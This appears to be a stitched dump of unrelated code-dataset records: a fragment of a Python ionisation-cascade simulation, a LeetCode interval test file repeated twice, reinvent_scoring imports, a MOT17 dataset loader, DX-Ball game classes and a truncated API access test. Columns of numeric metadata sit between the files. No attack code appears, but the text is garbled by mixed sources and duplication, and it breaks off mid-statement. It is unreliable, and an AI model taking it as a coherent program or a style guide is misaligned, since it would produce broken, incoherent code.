                                    counter117=1
                            counter116=1
                            break
                        # endif
                        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
                        if(IONSUM[int(NVAC)]> 28) :
                            print(' 5TH GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
                            sys.exit()
                        # endif
                        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
                        ELEFT=ELEFT-ETEMP
                        if(ELEFT < 0.0):
                            GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        # RANDOM EMISSION DIRECTION (isotropic)
                        R3=random.uniform(0.0,1.0)
                        THET=numpy.arccos(1.0-2.0*R3)
                        R4=random.uniform(0.0,1.0)
                        PHI=TWOPI*R4
                        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
                        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
                        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
                        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                        NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                        NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
                        # FIND LOWEST VACANCY
                        VACANCY(KGAS,LGAS,ISHELL,ILAST)
                        if(ILAST == 1):
                            # NO MORE TRANSITIONS POSSIBLE
                            return
                        # endif
                        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        # endif -- duplicated emulated jump kept from the translation
                        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    print(' ERROR IN CASCADE 5')
    sys.exit()
# end
| 44.671789
| 230
| 0.47919
| 9,218
| 72,681
| 3.777609
| 0.032111
| 0.07659
| 0.065074
| 0.082419
| 0.912728
| 0.899862
| 0.890845
| 0.884441
| 0.867928
| 0.858308
| 0
| 0.060797
| 0.372449
| 72,681
| 1,626
| 231
| 44.699262
| 0.702659
| 0.121435
| 0
| 0.866512
| 0
| 0
| 0.015235
| 0.000884
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0.002315
| 0.003086
| 0
| 0.048611
| 0.022377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82a3aea34ee00628b840ea5e29c026faf7a105fd
| 1,594
|
py
|
Python
|
tests/test_1851.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1851.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1851.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1851. Minimum Interval to Include Each Query
"""
@pytest.fixture(scope="session")
def init_variables_1851():
    """Session-scoped fixture yielding a factory for one shared Solution."""
    from src.leetcode_1851_minimum_interval_to_include_each_query import Solution

    shared_solution = Solution()

    def _factory():
        return shared_solution

    yield _factory
class TestClass1851:
    """Tests for LeetCode 1851: Minimum Interval to Include Each Query."""

    def test_solution_0(self, init_variables_1851):
        solution = init_variables_1851()
        intervals = [[1, 4], [2, 4], [3, 6], [4, 4]]
        queries = [2, 3, 4, 5]
        assert solution.minInterval(intervals, queries) == [3, 3, 1, 4]

    def test_solution_1(self, init_variables_1851):
        solution = init_variables_1851()
        intervals = [[2, 3], [2, 5], [1, 8], [20, 25]]
        queries = [2, 19, 5, 22]
        assert solution.minInterval(intervals, queries) == [2, -1, 4, 6]
#!/usr/bin/env python
import pytest
"""
Test 1851. Minimum Interval to Include Each Query
"""
@pytest.fixture(scope="session")
def init_variables_1851():
    """Session-scoped fixture: yields a callable returning one shared Solution."""
    from src.leetcode_1851_minimum_interval_to_include_each_query import Solution

    instance = Solution()

    def _provide():
        return instance

    yield _provide
class TestClass1851:
    """Tests for LeetCode 1851: Minimum Interval to Include Each Query."""

    def test_solution_0(self, init_variables_1851):
        sol = init_variables_1851()
        result = sol.minInterval([[1, 4], [2, 4], [3, 6], [4, 4]], [2, 3, 4, 5])
        assert result == [3, 3, 1, 4]

    def test_solution_1(self, init_variables_1851):
        sol = init_variables_1851()
        result = sol.minInterval([[2, 3], [2, 5], [1, 8], [20, 25]], [2, 19, 5, 22])
        assert result == [2, -1, 4, 6]
| 22.450704
| 101
| 0.59473
| 212
| 1,594
| 4.216981
| 0.20283
| 0.203579
| 0.266219
| 0.09396
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.133562
| 0.267252
| 1,594
| 70
| 102
| 22.771429
| 0.631849
| 0.025094
| 0
| 0.95
| 0
| 0
| 0.009736
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.2
| false
| 0
| 0.1
| 0.05
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
82c328bd97463563ef022a0a1cfd7a21a31c0060
| 586
|
py
|
Python
|
reinvent_scoring/scoring/__init__.py
|
MolecularAI/reinvent-scoring
|
f7e052ceeffd29e17e1672c33607189873c82a45
|
[
"MIT"
] | null | null | null |
reinvent_scoring/scoring/__init__.py
|
MolecularAI/reinvent-scoring
|
f7e052ceeffd29e17e1672c33607189873c82a45
|
[
"MIT"
] | 2
|
2021-11-01T23:19:42.000Z
|
2021-11-22T23:41:39.000Z
|
reinvent_scoring/scoring/__init__.py
|
MolecularAI/reinvent-scoring
|
f7e052ceeffd29e17e1672c33607189873c82a45
|
[
"MIT"
] | 2
|
2021-11-18T13:14:22.000Z
|
2022-03-16T07:52:57.000Z
|
from reinvent_scoring.scoring.function import *
from reinvent_scoring.scoring.enums import *
from reinvent_scoring.scoring.score_components import *
from reinvent_scoring.scoring.component_parameters import ComponentParameters
from reinvent_scoring.scoring.score_summary import FinalSummary, ComponentSummary, LoggableComponent
from reinvent_scoring.scoring.score_transformations import TransformationFactory
from reinvent_scoring.scoring.scoring_function_factory import ScoringFunctionFactory
from reinvent_scoring.scoring.scoring_function_parameters import ScoringFunctionParameters
| 58.6
| 100
| 0.904437
| 63
| 586
| 8.15873
| 0.31746
| 0.272374
| 0.29572
| 0.404669
| 0.476654
| 0.159533
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059727
| 586
| 9
| 101
| 65.111111
| 0.932849
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d5649c6b0b64ee81194b607ac28c5f2d12f97cb
| 7,014
|
py
|
Python
|
datasets/mot.py
|
yutliu/better_detr
|
f4e309a1947474be0c9aca98afb9adad52193df4
|
[
"Apache-2.0"
] | 3
|
2021-01-05T03:27:33.000Z
|
2021-01-05T09:42:57.000Z
|
datasets/mot.py
|
yutliu/better_detr
|
f4e309a1947474be0c9aca98afb9adad52193df4
|
[
"Apache-2.0"
] | null | null | null |
datasets/mot.py
|
yutliu/better_detr
|
f4e309a1947474be0c9aca98afb9adad52193df4
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Yutliu
"""
MOT dataset which returns image_id for evaluation.
"""
from pathlib import Path
import numpy as np
import torch
import torch.utils.data
import os.path as osp
from PIL import Image, ImageDraw
import datasets.transforms as T
class MOTDetection:
    """MOT17 training dataset.

    Reads a list of image paths from a fixed data-path file, derives the
    matching 'labels_with_ids' annotation paths, and returns
    (image, target) pairs with DETR-style target dicts.

    FIX: uses the public ``Image.size`` attribute instead of the private
    ``Image._size``.
    """

    def __init__(self, args, seqs_folder, transforms):
        self.args = args
        self._transforms = transforms
        # NOTE(review): hard-coded absolute path -- should likely come from args.
        path = r'/share/home/kaihuatrack/Code/detr/datasets/data_path/mot17.train'
        with open(path, 'r') as file:
            self.img_files = file.readlines()
        self.img_files = [osp.join(seqs_folder, x.strip()) for x in self.img_files]
        self.img_files = list(filter(lambda x: len(x) > 0, self.img_files))
        # Annotation path mirrors the image path: images/ -> labels_with_ids/,
        # image extension -> .txt
        self.label_files = [
            x.replace('images', 'labels_with_ids').replace('.png', '.txt').replace('.jpg', '.txt')
            for x in self.img_files]
        self.item_num = len(self.img_files)

    def pre_data(self, idx):
        """Load image ``idx`` and build its target dict.

        Labels are rows of (class, id, cx, cy, w, h) normalized to the
        image; boxes are converted to pixel xyxy and clamped to the image.
        NOTE(review): if the label file is missing, an empty target dict
        is returned -- downstream transforms may not handle that; confirm.
        """
        img_path = self.img_files[idx]
        label_path = self.label_files[idx]
        img = Image.open(img_path)
        targets = {}
        # FIX: Image.size is the public (width, height) attribute.
        w, h = img.size
        if osp.isfile(label_path):
            labels0 = np.loadtxt(label_path, dtype=np.float32).reshape(-1, 6)
            # Normalized cewh to pixel xyxy format
            labels = labels0.copy()
            labels[:, 2] = w * (labels0[:, 2] - labels0[:, 4]/2)
            labels[:, 3] = h * (labels0[:, 3] - labels0[:, 5]/2)
            labels[:, 4] = w * (labels0[:, 2] + labels0[:, 4]/2)
            labels[:, 5] = h * (labels0[:, 3] + labels0[:, 5]/2)
            targets['boxes'] = []
            targets['area'] = []
            targets['iscrowd'] = []
            targets['labels'] = []
            targets['image_id'] = torch.as_tensor(idx)
            targets['size'] = torch.as_tensor([h, w])
            targets['orig_size'] = torch.as_tensor([h, w])
            for label in labels:
                targets['boxes'].append(label[2:6].tolist())
                # NOTE(review): original computes area from the normalized
                # w*h columns (label[4]*label[5] post-conversion are pixel
                # xyxy values here) -- behavior preserved; verify intent.
                targets['area'].append(label[4] * label[5])
                targets['iscrowd'].append(0)
                targets['labels'].append(0)
            targets['area'] = torch.as_tensor(targets['area'])
            targets['iscrowd'] = torch.as_tensor(targets['iscrowd'])
            targets['labels'] = torch.as_tensor(targets['labels'])
            targets['boxes'] = torch.as_tensor(targets['boxes'], dtype=torch.float32).reshape(-1, 4)
            # Clamp boxes to the image rectangle.
            targets['boxes'][:, 0::2].clamp_(min=0, max=w)
            targets['boxes'][:, 1::2].clamp_(min=0, max=h)
        return img, targets

    def __getitem__(self, idx):
        img, target = self.pre_data(idx)
        if self._transforms is not None:
            img, target = self._transforms(img, target)
        return img, target

    def __len__(self):
        return self.item_num
class MOTDetection_val(MOTDetection):
    """Validation/test-split variant of :class:`MOTDetection`.

    The original class body was a verbatim, line-for-line copy of
    ``MOTDetection``; it is kept only as a distinct type so ``build()``
    can select it, so it now simply inherits everything.
    """
    pass
def make_mot_transforms(image_set):
    """Build the augmentation/normalisation pipeline for one split.

    'train' gets flips plus a random choice of multi-scale resize or
    resize+crop+resize; 'val' gets a deterministic single-scale resize.
    Raises ValueError for any other split name.
    """
    normalize = T.Compose([
        T.ToTensor(),
        T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])

    if image_set == 'val':
        return T.Compose([
            T.RandomResize([800], max_size=1333),
            normalize,
        ])

    if image_set == 'train':
        scales = [480, 512, 544, 576, 608, 640, 672, 704, 736, 768, 800]
        crop_branch = T.Compose([
            T.RandomResize([400, 500, 600]),
            T.RandomSizeCrop(384, 600),
            T.RandomResize(scales, max_size=1333),
        ])
        return T.Compose([
            T.RandomHorizontalFlip(),
            T.RandomSelect(
                T.RandomResize(scales, max_size=1333),
                crop_branch,
            ),
            normalize,
        ])

    raise ValueError(f'unknown {image_set}')
def build(image_set, args):
    """Create the MOT dataset for ``image_set`` ('train' or 'test').

    Raises:
        AssertionError: if ``args.mot_path`` does not exist.
        ValueError: for an unknown ``image_set`` (the original fell through
        and hit ``NameError`` on the unset ``dataset`` variable).
    """
    root = Path(args.mot_path)
    assert root.exists(), f'provided MOT path {root} does not exist'
    if image_set == 'train':
        return MOTDetection(args, root, transforms=make_mot_transforms('train'))
    if image_set == 'test':
        # bug fix: make_mot_transforms only accepts 'train'/'val'; the
        # original forwarded 'test' and always raised ValueError here.
        return MOTDetection_val(args, root, transforms=make_mot_transforms('val'))
    raise ValueError(f'unknown image_set {image_set}')
| 36.341969
| 105
| 0.563872
| 889
| 7,014
| 4.304837
| 0.184477
| 0.032924
| 0.056441
| 0.041808
| 0.81134
| 0.804808
| 0.78913
| 0.78913
| 0.766658
| 0.766658
| 0
| 0.039437
| 0.280582
| 7,014
| 192
| 106
| 36.53125
| 0.718985
| 0.063872
| 0
| 0.794521
| 0
| 0
| 0.078967
| 0.019551
| 0
| 0
| 0
| 0
| 0.006849
| 1
| 0.068493
| false
| 0
| 0.047945
| 0.013699
| 0.191781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d56e4a994957760900241cbb071a75c2f5923a2
| 247
|
py
|
Python
|
src/retrieve/methods/align/__init__.py
|
emanjavacas/retrieve
|
451df1cb99d637aca54616c6c342bc0408057c48
|
[
"MIT"
] | null | null | null |
src/retrieve/methods/align/__init__.py
|
emanjavacas/retrieve
|
451df1cb99d637aca54616c6c342bc0408057c48
|
[
"MIT"
] | 2
|
2020-06-04T20:42:16.000Z
|
2020-09-14T07:49:20.000Z
|
src/retrieve/methods/align/__init__.py
|
emanjavacas/retrieve
|
451df1cb99d637aca54616c6c342bc0408057c48
|
[
"MIT"
] | 1
|
2020-07-21T12:45:52.000Z
|
2020-07-21T12:45:52.000Z
|
from .align import BaseScorer, EmbeddingScorer, ConstantScorer, LookupScorer
from .align import get_horizontal_alignment, local_alignment
from .align import get_alignment_ranges, get_alignment_string
from .parallel_align import align_collections
| 41.166667
| 76
| 0.874494
| 30
| 247
| 6.9
| 0.5
| 0.21256
| 0.217391
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089069
| 247
| 5
| 77
| 49.4
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d9632725f09a026d9581e9fcc6358f43e4176a4
| 31,407
|
py
|
Python
|
objects.py
|
veeral-agarwal/DX-BALL
|
d2e83c1cbbccd2122f53b5904066797cd6d30975
|
[
"MIT"
] | null | null | null |
objects.py
|
veeral-agarwal/DX-BALL
|
d2e83c1cbbccd2122f53b5904066797cd6d30975
|
[
"MIT"
] | null | null | null |
objects.py
|
veeral-agarwal/DX-BALL
|
d2e83c1cbbccd2122f53b5904066797cd6d30975
|
[
"MIT"
] | null | null | null |
import global_variables
import numpy as np
import config
from colorama import Fore, init , Back , Style
init()
import time
from time import time,sleep
import random
import math
class Objects():
    """Base class for every drawable board object (paddle, ball, bricks,
    power-ups): tracks position/size and draws itself on the shared board."""

    def __init__(self, obj, xpos, ypos):
        self.position_x = xpos
        self.position_y = ypos
        self.height = len(obj)      # sprite rows
        self.width = len(obj[0])    # sprite columns
        self.shape = obj

    def update_x_position(self, x):
        """Move horizontally by ``x``, clamping into the playfield.

        NOTE(review): clamping happens BEFORE the move, so a move starting
        inside the [4, 90] band can still overshoot it — preserved as-is,
        may be intentional game behaviour.
        """
        if self.position_x <= 4:
            self.position_x = 4
        if self.position_x >= 90:
            self.position_x = 90
        if self.position_x > 1 and self.position_x <= 90:
            self.position_x += x

    def update_y_position(self, y):
        self.position_y += y

    def current_position_x(self):
        return self.position_x

    def current_position_y(self):
        return self.position_y

    def clear(self):
        """Blank this object's cells on the board."""
        for i in range(self.width):
            for j in range(self.height):
                global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = " "

    def render(self):
        """Draw the paddle sprite, resized according to active power-ups.

        The original repeated the identical draw loop in three branches;
        shape selection and drawing are factored apart here — same effect.
        """
        flags = global_variables.active_powerupflag
        if flags[4] == 1 and flags[1] == 0:
            self.shape = config.shrink_p     # shrink power-up active
        elif flags[1] == 1 and flags[4] == 0:
            self.shape = config.expand_p     # expand power-up active
        else:
            self.shape = config.paddle       # both or neither: normal size
        self.width = len(self.shape[0])
        for i in range(self.width):
            for j in range(self.height):
                global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = (
                    Back.CYAN + Fore.CYAN + self.shape[j][i])
class Paddle(Objects):
    """The player's paddle; tracks starting lives and score."""

    def __init__(self, obj, xpos, ypos, lives):
        # fix: the `lives` argument was accepted but ignored (hard-coded 5);
        # callers passing 5 observe identical behaviour.
        self.initial_lives = lives
        self.score = 0
        super().__init__(obj, xpos, ypos)

    def lives(self):
        """Return the paddle's starting life count."""
        return self.initial_lives
class Ball(Objects):
    """The ball: bounces off walls/paddle and honours the grab (3) and
    fast-ball (2) power-ups."""

    # Horizontal deflection added per paddle cell hit, keyed by the cell
    # offset from the paddle's left edge. Values preserved from the original.
    _NORMAL_DEFLECT = {0: -2, 1: -1, 2: 0, 3: 1, 4: 2}
    # NOTE(review): offset 0 was `speed_x -= -1` (i.e. +1) in the original —
    # preserved verbatim, though it looks like a sign typo for -1.
    _SHRUNK_DEFLECT = {0: 1, 1: 0, 2: 1}
    _EXPANDED_DEFLECT = {0: -2, 1: -1, 2: 0, 3: 1, 4: 2}

    def __init__(self, obj, xpos, ypos):
        super().__init__(obj, xpos, ypos)
        self.speed_x = 0
        self.speed_y = 0
        self.begin_time = time()
        self.onetimetempflag = 0   # fast-ball speed-up applied at most once

    def speed(self):
        """Restore the velocity saved when the ball was grabbed."""
        self.speed_x = global_variables.ball_privious_speed_x
        self.speed_y = global_variables.ball_privious_speed_y

    def collision_with_wall(self):
        """Reflect off side/top walls; falling past the bottom resets the board."""
        if self.position_x + self.speed_x <= 1 or self.position_x + self.speed_x >= 96:
            self.speed_x *= -1
        if self.position_y <= 4:
            self.speed_y *= -1
        elif self.position_y + self.speed_y >= 37:
            default()   # ball lost: costs a life, re-docks the ball
            self.speed_x = 0
            self.speed_y = 0

    def clear(self):
        for i in range(self.width):
            for j in range(self.height):
                global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = " "

    def render(self):
        # fast-ball power-up: bump |speed_x| by one, exactly once
        if global_variables.active_powerupflag[2] == 1 and self.onetimetempflag == 0:
            if self.speed_x < 0:
                self.speed_x -= 1
            else:
                self.speed_x += 1
            self.onetimetempflag = 1
        self.collision_with_wall()
        self.collision_with_paddle()
        self.position_x += self.speed_x
        self.position_y -= self.speed_y
        for i in range(self.width):
            for j in range(self.height):
                global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = self.shape[j][i]

    def _grab_or_bounce(self, dx):
        """On paddle contact: grab the ball if power-up 3 is active, else
        reflect vertically and add ``dx`` to the horizontal speed."""
        if global_variables.active_powerupflag[3] == 1:
            # save velocity so speed() can restore it on release
            global_variables.ball_privious_speed_x = self.speed_x
            global_variables.ball_privious_speed_y = -1 * self.speed_y
            self.speed_y = 0
            self.speed_x = 0
            global_variables.flag = 0
            global_variables.main_ball.position_y = 34
        else:
            self.speed_y *= -1
            self.speed_x += dx

    def collision_with_paddle(self):
        """Bounce off the paddle; the cell that was hit picks the deflection.

        The original repeated the identical grab-or-bounce body once per
        paddle cell and per paddle size; collapsed into deflection tables.
        An unreachable duplicate `position_x+4` branch (expanded paddle,
        dx=+3, shadowed by an identical earlier elif) was removed as dead code.
        """
        flags = global_variables.active_powerupflag
        if flags[1] == flags[4]:      # both or neither size power-up: normal
            deflect = self._NORMAL_DEFLECT
        elif flags[4] == 1:           # shrunk paddle
            deflect = self._SHRUNK_DEFLECT
        else:                         # expanded paddle
            deflect = self._EXPANDED_DEFLECT
        if self.position_y == 35 or self.position_y == 36:
            offset = self.position_x - global_variables.main_paddle.position_x
            if offset in deflect:
                self._grab_or_bounce(deflect[offset])
class Brick(Objects):
    """A destructible brick. ``weight`` is the remaining hit count
    (np.inf = indestructible); ``contain_powerup`` is the power-up id
    dropped when the brick is destroyed (falsy id = no power-up)."""

    def __init__(self, obj, xpos, ypos, weight, power):
        super().__init__(obj, xpos, ypos)
        self.weight = weight
        self.score = 0
        self.flag = 0
        self.contain_powerup = power
        self.isexplosive = False

    def render(self):
        """Paint the brick colour-coded by remaining weight, or blank it
        once destroyed / caught in an explosion."""
        # colour prefix per weight — strings preserved from the original,
        # including the Back/Fore ordering differences per weight
        colours = {
            1: Back.BLUE + Fore.BLUE,
            2: Fore.GREEN + Back.GREEN,
            3: Fore.RED + Back.RED,
            4: Fore.MAGENTA + Back.MAGENTA,
            np.inf: Fore.WHITE + Back.WHITE,
        }
        for i in range(self.width):
            for j in range(self.height):
                if (self.weight > 0) and ((self.position_x, self.position_y) not in global_variables.explosion_coordinates):
                    prefix = colours.get(self.weight)
                    if prefix is not None:
                        global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = prefix + self.shape[j][i]
                else:
                    self.weight = 0
                    global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = ' '

    def _drop_powerup(self, mark_inair):
        """Spawn this brick's power-up token (if any) at the brick position."""
        shapes = {
            5: config.thru_ball,
            4: config.shrink_paddle,
            1: config.expand_paddle,
            2: config.fast_ball,
            3: config.paddle_grab,
        }
        shape = shapes.get(self.contain_powerup)
        if shape is not None:
            global_variables.powerup_objects.append(
                Powerup(shape, self.position_x, self.position_y, self.contain_powerup))
            if mark_inair:
                global_variables.inair_powerupflag[self.contain_powerup] = 1

    def collision_ball_brick(self):
        """Handle the ball hitting any of this brick's three cells.

        The original had three near-identical branches (one per cell) whose
        angle computations were dead code — every arm of the angle checks
        performed the same conditional ``speed_y *= -1`` (skipped while the
        thru-ball power-up, flag 5, is active) — so the branches are
        collapsed here. The quintuplicated power-up spawn block is factored
        into ``_drop_powerup``.
        """
        if not self.isexplosive:
            ball = global_variables.main_ball
            if ball.position_y == self.position_y and ball.position_x - self.position_x in (0, 1, 2):
                if (self.weight > 0 and self.weight < 4) or (self.weight == np.inf):
                    if global_variables.active_powerupflag[5] == 0:
                        ball.speed_y *= -1
                    if self.weight == 1:
                        # last hit: score and drop the power-up (marked in-air)
                        config.score += 1
                        self._drop_powerup(mark_inair=True)
                        global_variables.main_paddle.score += 1
                    if global_variables.active_powerupflag[5] == 1:
                        # thru-ball destroys outright; original spawned the
                        # power-up again here (without the in-air flag) —
                        # behaviour preserved
                        self.weight = 0
                        config.score += 1
                        self._drop_powerup(mark_inair=False)
                    else:
                        self.weight -= 1
class Exploding_bricks(Objects):
    """An explosive brick: a ball hit (or a neighbouring explosion reaching
    its cell) destroys it and records its blast area via explosion_coor()."""

    def __init__(self, obj, xpos, ypos):
        super().__init__(obj, xpos, ypos)
        self.strength = 1
        self.isexplosive = True
        self.flag = 0   # set once this brick has chain-detonated

    def clear(self):
        for i in range(self.width):
            for j in range(self.height):
                global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = " "

    def render(self):
        """Draw the brick, or blank it (detonating once) if an explosion
        has reached its position."""
        if self.flag == 0:
            if (self.position_x, self.position_y) in global_variables.explosion_coordinates:
                # chain reaction: detonate exactly once
                self.flag = 1
                self.strength = 0
                explosion_coor(self.position_x, self.position_y)
        exploded = (self.position_x, self.position_y) in global_variables.explosion_coordinates
        for i in range(self.width):
            for j in range(self.height):
                global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = (
                    ' ' if exploded else self.shape[j][i])

    def collision_ball_brick(self):
        """Detonate when the ball touches any of the brick's three cells.

        The original triplicated this body verbatim, once per cell offset.
        """
        ball = global_variables.main_ball
        if ball.position_y == self.position_y and ball.position_x - self.position_x in (0, 1, 2):
            self.strength = 0
            explosion_coor(self.position_x, self.position_y)
            for i in range(self.width):
                for j in range(self.height):
                    global_variables.main_board.matrix[j + self.position_y][i + self.position_x] = ' '
class Powerup(Objects):
    """A power-up token that falls from a destroyed brick; activating it
    when caught by the paddle, disappearing if it reaches the floor."""

    def __init__(self, obj, xpos, ypos, power):
        super().__init__(obj, xpos, ypos)
        self.speed_y = -1            # falls one row per frame
        self.contain_powerup = power
        self.speed_flag = 0          # 1 once collected or lost

    def render(self):
        if self.speed_flag == 0:
            self.position_y -= self.speed_y
            self.collision_with_paddle()
        for row in range(self.height):
            for col in range(self.width):
                global_variables.main_board.matrix[row + self.position_y][col + self.position_x] = (self.shape[row][col])

    def collision_with_paddle(self):
        """Activate the power-up when the paddle catches the token; stop it
        if it falls past the bottom row."""
        if self.position_y in (35, 36):
            paddle = global_variables.main_paddle
            caught = (paddle.position_x
                      <= self.position_x
                      <= paddle.position_x + paddle.width)
            if caught:
                self.speed_flag = 1
                self.position_y = 2   # park the (now invisible) token off-board
                global_variables.active_powerupflag[self.contain_powerup] = 1
                global_variables.powerup_start_time[self.contain_powerup] = time()
                global_variables.inair_powerupflag[self.contain_powerup] = 0
                self.shape = [[' ']]
        if self.position_y > 36:
            self.speed_y = 0
            self.speed_flag = 1
def explosion_coor(x, y):
    """Record the blast footprint of an exploding brick centred at (x, y)."""
    blast = [
        (x - 3, y), (x + 3, y),
        (x - 3, y - 1), (x + 3, y - 1),
        (x - 3, y + 1), (x + 3, y + 1),
        (x, y - 1), (x, y + 1), (x, y),
    ]
    for coord in blast:
        global_variables.explosion_coordinates.append(coord)
def default():
    # Reset after the ball is lost: costs one life and re-docks the ball
    # just above the paddle at the starting position.
    global_variables.main_paddle.clear()
    global_variables.main_ball.clear()
    config.lives -= 1
    global_variables.flag = 0  # presumably 0 = ball docked, awaiting launch — confirm
    global_variables.main_paddle.position_x=5
    global_variables.main_paddle.position_y=35
    global_variables.main_ball.position_x=5
    global_variables.main_ball.position_y=33
    # allow the fast-ball speed-up to apply again on the next activation
    global_variables.main_ball.onetimetempflag = 0
    global_variables.main_ball.render()
    global_variables.main_paddle.render()
    # deactivate every power-up
    for i in range(len(global_variables.active_powerupflag)):
        global_variables.active_powerupflag[i] = 0
| 51.741351
| 204
| 0.562391
| 3,633
| 31,407
| 4.573631
| 0.03248
| 0.212145
| 0.071979
| 0.092441
| 0.901601
| 0.886254
| 0.865852
| 0.833293
| 0.823122
| 0.820294
| 0
| 0.020205
| 0.35231
| 31,407
| 607
| 205
| 51.741351
| 0.796628
| 0.016493
| 0
| 0.763636
| 0
| 0
| 0.000291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.016162
| 0.006061
| 0.088889
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7ddc44ecd5853c704ed9413854b10813fa29f63f
| 7,748
|
py
|
Python
|
tests/functional/test_patient_access.py
|
harryhmc/personal-demographics-service-api
|
33b427284aab58fbecea6fd9d74dfd7ecfbf1831
|
[
"MIT"
] | null | null | null |
tests/functional/test_patient_access.py
|
harryhmc/personal-demographics-service-api
|
33b427284aab58fbecea6fd9d74dfd7ecfbf1831
|
[
"MIT"
] | null | null | null |
tests/functional/test_patient_access.py
|
harryhmc/personal-demographics-service-api
|
33b427284aab58fbecea6fd9d74dfd7ecfbf1831
|
[
"MIT"
] | null | null | null |
from tests.functional.config_files import config
import requests
import uuid
import pytest
@pytest.mark.asyncio
class TestUserRestrictedPatientAccess:
    async def test_patient_access_retrieve_happy_path(
        self, nhs_login_token_exchange
    ):
        """A patient with an NHS-login token can retrieve a record -> 200.

        NOTE(review): 9912003071 is presumably the NHS number bound to the
        test login identity — confirm against the fixture.
        """
        token = await nhs_login_token_exchange()
        headers = {
            "NHSD-SESSION-URID": "123",
            "Authorization": "Bearer " + token,
            "X-Request-ID": str(uuid.uuid4()),
        }
        r = requests.get(
            f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
            headers=headers,
        )
        assert r.status_code == 200
    async def test_patient_access_retrieve_non_matching_nhs_number(
        self, nhs_login_token_exchange
    ):
        """Retrieving a record other than the token holder's own is rejected
        with 403 ACCESS_DENIED."""
        token = await nhs_login_token_exchange()
        headers = {
            "NHSD-SESSION-URID": "123",
            "Authorization": "Bearer " + token,
            "X-Request-ID": str(uuid.uuid4()),
        }
        # 123456789 does not match the NHS number bound to the token
        r = requests.get(
